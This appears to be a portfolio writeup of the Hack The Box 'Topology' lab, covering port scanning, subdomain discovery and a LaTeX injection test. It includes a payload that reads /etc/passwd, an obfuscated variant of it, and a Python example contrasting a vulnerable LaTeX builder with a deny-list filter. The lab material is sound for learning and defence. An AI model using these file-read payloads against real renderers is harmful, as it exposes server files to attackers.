Kshitij Raj Portfolio


1. Port Scanning

┌──(ezio㉿kali)-[~/htb/topology]
└─$ rustscan -a topology.htb -- -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/ezio/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.217:22
Open 10.10.11.217:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV" on ip 10.10.11.217
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-24 17:44 IST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.00s elapsed
Initiating Ping Scan at 17:44
Scanning 10.10.11.217 [2 ports]
Completed Ping Scan at 17:44, 0.07s elapsed (1 total hosts)
Initiating Connect Scan at 17:44
Scanning topology.htb (10.10.11.217) [2 ports]
Discovered open port 22/tcp on 10.10.11.217
Discovered open port 80/tcp on 10.10.11.217
Completed Connect Scan at 17:44, 0.07s elapsed (2 total ports)
Initiating Service scan at 17:44
Scanning 2 services on topology.htb (10.10.11.217)
Completed Service scan at 17:45, 6.23s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.217.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 3.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.42s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.00s elapsed
Nmap scan report for topology.htb (10.10.11.217)
Host is up, received syn-ack (0.072s latency).
Scanned at 2023-08-24 17:44:55 IST for 11s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
|   256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIR4Yogc3XXHR1rv03CD80VeuNTF/y2dQcRyZCo4Z3spJ0i+YJVQe/3nTxekStsHk8J8R28Y4CDP7h0h9vnlLWo=
|   256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaM68hPSVQXNWZbTV88LsN41odqyoxxgwKEb1SOPm5k
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Miskatonic University | Topology Group
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.75 seconds

Two ports are open: 22 (OpenSSH 8.2p1 on Ubuntu) and 80 (Apache httpd 2.4.41). With SSH fully patched for its release, the web application on port 80 is the obvious place to start.


2. Enumeration

Port 80 serves a website.

Screenshot 2023-08-24 at 17.46.27.png

A gobuster directory brute-force against the site turns up nothing of interest.

The page source references a subdomain of topology.htb; add it to /etc/hosts next to topology.htb and browse to it.

Screenshot 2023-08-24 at 17.48.37.png

This site renders equations from user-supplied LaTeX code.

LaTeX is a full macro language, not just equation markup: if the generator hands the input to the TeX engine without filtering file-access commands, the server will typeset the contents of any file its process can read. A quick test uses \lstinputlisting from the listings package, which includes a file verbatim:

payload: $\lstinputlisting{/etc/passwd}$
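As an added example (my own code, not part of this writeup or of the target's generator), here is the pattern that makes the payload above work and what a hardened generator looks like instead: a vulnerable build that splices the user's LaTeX straight into the document handed to pdflatex, beside a hardened build that tokenizes the snippet into control sequences and rejects file-reading, file-writing and macro-redefinition commands before the TeX engine ever sees it. The function names, the deny-list and the sample snippets are assumptions for illustration; the deny-list catches the obvious cases and the `\csname` obfuscation, but a production service should allow-list a small set of math macros rather than deny-list.

```python
import re

# Control sequences that let TeX read files (\input, \lstinputlisting, \openin,
# \read), write files (\openout, \write), run commands (\write18), or rebuild
# any of those under a new name (\def, \let, \csname, \catcode, \scantokens).
# Illustrative deny-list, assumed for this example; not exhaustive.
DANGEROUS = {
    "input", "include", "lstinputlisting", "verbatiminput", "InputIfFileExists",
    "openin", "read", "readline", "openout", "write", "write18", "immediate",
    "catcode", "def", "edef", "gdef", "let", "csname", "endcsname",
    "newread", "newwrite", "scantokens", "usepackage", "documentclass",
    "makeatletter",
}

# A control sequence is a backslash followed by letters (a named macro) or by
# exactly one non-letter (an escaped delimiter such as \$ or \\).
CONTROL_SEQ = re.compile(r"\\([A-Za-z]+|[^A-Za-z])")

MAX_SNIPPET_LEN = 500  # assumed limit; keeps the typesetting job small


def control_sequences(src: str) -> list:
    """Return every control-sequence name in the snippet, in order."""
    return [m.group(1) for m in CONTROL_SEQ.finditer(src)]


def find_dangerous(src: str) -> list:
    """Names from DANGEROUS that appear in the snippet, in order of appearance."""
    return [name for name in control_sequences(src) if name in DANGEROUS]


def is_safe_snippet(src: str) -> bool:
    """True only if the snippet is short and uses no dangerous control sequence."""
    return len(src) <= MAX_SNIPPET_LEN and not find_dangerous(src)


def build_document_vulnerable(user_tex: str) -> str:
    """Vulnerable pattern: the user's LaTeX is spliced verbatim into the
    document that will be passed to pdflatex. With the listings package loaded,
    $\\lstinputlisting{/etc/passwd}$ typesets that file into the output image."""
    return (
        "\\documentclass{article}\n"
        "\\usepackage{listings}\n"
        "\\begin{document}\n"
        f"${user_tex}$\n"
        "\\end{document}\n"
    )


def build_document_hardened(user_tex: str) -> str:
    """Hardened pattern: reject dangerous control sequences before anything
    reaches TeX. In a real service, additionally run the engine with
    -no-shell-escape, in an empty working directory, as an unprivileged user."""
    bad = find_dangerous(user_tex)
    if bad:
        raise ValueError("rejected control sequence(s): " + ", ".join(bad))
    if len(user_tex) > MAX_SNIPPET_LEN:
        raise ValueError("snippet too long")
    return build_document_vulnerable(user_tex)


if __name__ == "__main__":
    # Constructed sample inputs: one honest equation, the payload from the
    # writeup, and an obfuscated variant that spells the macro via \csname.
    samples = [
        r"\frac{a}{b} + \sqrt{2} = \alpha",
        r"\lstinputlisting{/etc/passwd}",
        r"\csname lstinputlisting\endcsname{/etc/passwd}",
    ]
    for s in samples:
        verdict = "accepted" if is_safe_snippet(s) else "rejected " + str(find_dangerous(s))
        print(f"{s!r:55} -> {verdict}")
```

Running the block shows the honest equation accepted and both payload forms rejected; the vulnerable builder, by contrast, emits a document containing `\lstinputlisting{/etc/passwd}` inside the math delimiters, which is exactly what the target's generator must be doing.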